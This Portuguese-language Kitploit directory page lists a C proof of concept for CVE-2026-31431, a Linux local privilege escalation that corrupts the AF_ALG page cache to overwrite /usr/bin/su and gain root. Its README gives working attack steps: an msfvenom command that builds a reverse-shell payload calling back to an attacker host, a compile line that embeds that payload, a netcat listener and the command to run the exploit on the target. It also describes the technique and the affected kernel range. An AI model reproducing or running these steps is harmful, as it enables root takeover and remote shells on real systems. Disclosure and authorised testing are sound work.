Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-31431 — PoC em C para CVE-2026-31431, uma LPE no Linux sem privilégios que explora a corrupção do cache de páginas do AF_ALG para sobrescrever /usr/bin/su e obter root. | Kitploit
Ferramentas/GitHubGitHub/mcub3/cve-2026-31431
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubmcub3/cve-2026-31431

CVE-2026-31431

PoC em C para CVE-2026-31431, uma LPE no Linux sem privilégios que explora a corrupção do cache de páginas do AF_ALG para sobrescrever /usr/bin/su e obter root.

Ver Repositório
19há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-31431 (Copy Fail) — PoC em C

LPE trivial sem privilégios ao escrever 4 bytes controlados no cache de páginas de qualquer arquivo legível por meio de um bug lógico em AF_ALG (kernel 4.14 → início de 2026).

Corrompa /usr/bin/su em memória e execute-o → root.

Captura de tela do exploit

Compilar e Executar

# 1. Gere um payload ELF (exemplo de reverse shell)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. Compile (estático, sem símbolos, payload embutido via .incbin)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. Inicie o listener primeiro (nc -lvp <LPORT>), depois execute o exploit no host alvo
./copy_fail_x86

Detalhes Principais

• CVE: CVE-2026-31431 • CVSS: 7.8 • Correção: commit a664bf3d603d

• Funciona em praticamente todas as distros Linux 2017–2026 (incluindo contêineres).

• Técnica: abre /usr/bin/su com O_RDONLY, abusa da descriptografia in-place do AEAD para inserir um payload personalizado diretamente no cache de páginas, contornando o VFS.

• Divulgação original e PoC em Python de 732 bytes → https://copy.fail

Licença

MIT – consulte LICENSE. Apenas para fins educacionais/testes autorizados. Use por sua conta e risco.

Baixar ferramenta